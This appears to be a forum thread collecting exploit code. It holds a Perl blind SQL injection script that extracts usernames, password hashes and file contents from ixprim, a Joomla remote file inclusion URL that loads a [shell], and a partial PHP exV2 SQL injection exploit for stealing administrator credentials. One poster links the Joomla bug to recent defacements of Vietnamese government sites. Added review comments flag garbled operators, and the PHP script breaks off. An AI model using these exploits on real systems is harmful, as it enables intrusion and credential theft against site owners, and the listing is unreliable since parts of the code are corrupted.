

#

# magic_quotes_gpc=off

# ====================

# [SQL] and LOAD_FILE("C:/Program

Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php")

# REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]");

#

# magic_quotes_gpc=on

# ===================

# [SQL] and

LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char (103),char(114),

#

char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char (47),char(69),

#

char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56 ),char(47),char(119),

#

char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),c har(109),char(45),

#

char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char( 47),char(109),char(97),

#

char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),c har(104),char(112)))

#

REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),c har(69),char(34),char(44),

# char(32),char(39),char([PART_OF_IXP_CODE])))

#

&sendreq(1,32,"load_file(concat(".concatchar($fpd)."))

REGEXP(concat(".concatchar("IXP_CODE\", '"));

exit(1);

# Determine if the sql request return true or false

# Modify the username's charset if it contains a special char

# sleep(2) needed for bypass the antiflood protection


# If the username's length > 19 the exploit doesn't work

#

# Character-at-a-time, boolean-based blind extraction loop over positions
# $start..$limit of the injected expression $sql.  Every candidate character
# costs one GET request (2 s apart), and a hit is recognised by a fixed HTML
# marker in the response.  From a monitoring point of view this produces long
# runs of near-identical requests to one URL that differ only in a trailing
# substr((...),N,1)=char(..) clause -- an easily recognisable pattern.
# Params: $start/$limit - first/last character position probed;
#         $sql          - sub-expression; its leading keyword picks the alphabet.
# Returns the string collected so far (see the NOTE on $gchar below).
# Relies on file-scope names not shown here: $bsql (base URL), $ua (user agent)
# and GET (presumably HTTP::Request::Common) -- confirm against the full file.
# NOTE(review): the `()` prototype performs no argument checking; the call
# site in this file uses the `&sendreq(...)` form, which bypasses it anyway.
# @charset, $y, $req and $res are undeclared package globals (no `my`).
sub sendreq() {

my($start,$limit,$sql) = ($_[0],$_[1],$_[2]);

my($gchar,$char) = '';   # list assignment: $gchar becomes '', $char stays undef

# Alphabet selection by prefix of $sql.  NOTE(review): as printed the ranges
# read "0 9" / "a z"; the `..` range operator appears lost in extraction.
@charset=(0 9) if $sql =~ /^(length|select%20uid)/;

@charset=(a z,0 9) if $sql =~ /^select%20uname/;

@charset=(a f,0 9) if $sql =~ /^(select%20pass|load_file)/;

for($y=$start;$y<=$limit;$y++) {

foreach $char (@charset) {   # aliases the lexical $char; restored after the loop

print STDERR "\r sploit> $gchar$char";   # progress line, prefix + current guess

# substr() form for ordinary sub-selects; the load_file form compares the
# whole prefix collected so far instead.
if($sql !~ /load_file/) {

$req = GET $bsql."%20and%20substr((".$sql."),$y,1)=".concatchar($char);} else {

$req = GET $bsql."%20and%20".$sql.",".concatchar($gchar.$char)."))";} sleep(2);   # 2 s spacing (see header comment)

$res = ($ua->request($req))->content;

# The injected condition is judged true when this marker appears in the page.
if($res =~ /<br \/> <div id="comments">/) {

# NOTE(review): as printed this overwrites $gchar; the progress line and the
# load_file branch treat $gchar as an accumulated prefix, so `.=` was
# probably lost in extraction -- confirm against the original source.
$gchar = $char;

last;}}

# Early exit for length probes once the digits collected end in 9 (as printed).
# $char here is its pre-loop value, since foreach restores the loop variable.
if(($sql =~ /length/) and ($gchar.$char =~ /^([0-9]+)9$/)){

last;}}

print STDERR "\n";

return $gchar.$char;   # $char is the restored pre-loop value here as well

}

# Render a string as a comma-separated list of MySQL char(N) calls, one per
# byte, e.g. "ab" -> "char(97),char(98)" -- the form the header of this file
# pairs with magic_quotes_gpc=on, since it needs no quote characters.
# Param: $string - bytes to encode.  Returns '' for an empty string.
# NOTE(review): as printed, both assignments inside the loop use `=` rather
# than `.=`, so only the last fragment would survive; the page text looks
# garbled here (the `.=` operator appears lost in extraction) -- confirm
# against the original source before relying on this listing.
# $i is an undeclared package global (no `my`).
sub concatchar() {

my $string = shift;

my $temp = '';

for($i=0;$i<length($string);$i++) {

$temp = "char(".ord(substr($string,$i,1)).")";

$temp = ',' if $i != (length($string)-1);   # separator between fragments, not after the last

}

return $temp;

}

black_hat_cr(HCE)

Joomla 1.0.11 (newest) RFI - Vuln

Code:

> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-=

> [2006-Nov-06] register_globals is On

>

> Bug : include_once ( $mosConfig_absolute_path '/language/'

$mosConfig_lang '.php' );

>

> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-=

>

> Exploit :

www.target.com/Jooma/installation/index.php?mosConfig_absolute_path=[shell]?

> ->

www.target.com/Joomla/administrator/components/com_admin/admin.admin.html php?mosConfig_absolute_path=[shell]?

Chắc đây là lý do một số site gov.vn vừa mới bị hack.

micimacko(HCE)

Joomla Banner Component Index.PHP SQL Injection Vulnerability

Code:

#!/usr/bin/php -q -d short_open_tag=on

<?

// `<?` is the short open tag; it only parses because the shebang line above
// passes -d short_open_tag=on.  Everything below runs at file scope.
// Banner: print_r() on a string simply echoes it.
print_r('

-

exV2 <= 2.0.4.3 "sort" SQL injection / administrative credentials

disclosure

exploit

mail: retrog@alice.it

site: http://retrogod.altervista.org

dork: "Powered by eXV2 Vers"

- ');

/*

this works regardless of php.ini settings

against Mysql >= 4.1 (allowing subs)

and if 'messages' module is enabled

*/

// Argument gate: $argc counts the script name, so this only rejects calls
// with fewer than three positional arguments.
// NOTE(review): the usage text lists four (host path user pass), so a call
// missing `pass` is not caught here -- confirm the intended threshold.
if ($argc<4) {

print_r('

- Usage: php '.$argv[0].' host path user pass OPTIONS

host: target server (ip/hostname)

path: path to exv2

user/pass: valide user credentials

Options:

-T[prefix: specify a table prefix, other than default (exv2_) -p[port]: specify a port other than 80

-P[ip:port]: specify a proxy

Example:

php '.$argv[0].' 2.2.2.2 /exv2/ rgod test -P1.1.1.1:80

php '.$argv[0].' 1.1.1.1 / rgod test -p81

- ');

die;

}

error_reporting(0);   // silences every PHP diagnostic, so later failures are invisible

ini_set("max_execution_time",0);   // 0 = no execution time limit

ini_set("default_socket_timeout",5);   // socket stream timeout, in seconds

/**
 * Hex/ASCII dump of a byte string.
 *
 * Output is the hex column block, then "\r\n", then the text column block.
 * Each byte contributes " xx" to the hex block and either " c" (printable,
 * 0x21..0x7e) or a lone " " (anything else) to the text block; both blocks
 * get a "\r\n" after every 15 bytes.
 *
 * @param string $string raw bytes to render
 * @return string        hex block . "\r\n" . text block ("\r\n" alone for "")
 */
function quick_dump($string)
{
    $hex_part  = '';
    $text_part = '';
    $in_row    = 0;
    $len       = strlen($string);
    for ($pos = 0; $pos < $len; $pos++) {
        $byte      = ord($string[$pos]);
        $printable = ($byte > 32 && $byte <= 126);
        $text_part .= $printable ? ' ' . $string[$pos] : ' ';
        $hex_part  .= ' ' . sprintf('%02x', $byte);   // always two hex digits
        if (++$in_row == 15) {                         // wrap both columns every 15 bytes
            $in_row     = 0;
            $text_part .= "\r\n";
            $hex_part  .= "\r\n";
        }
    }
    return $hex_part . "\r\n" . $text_part;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy ';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy ';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';
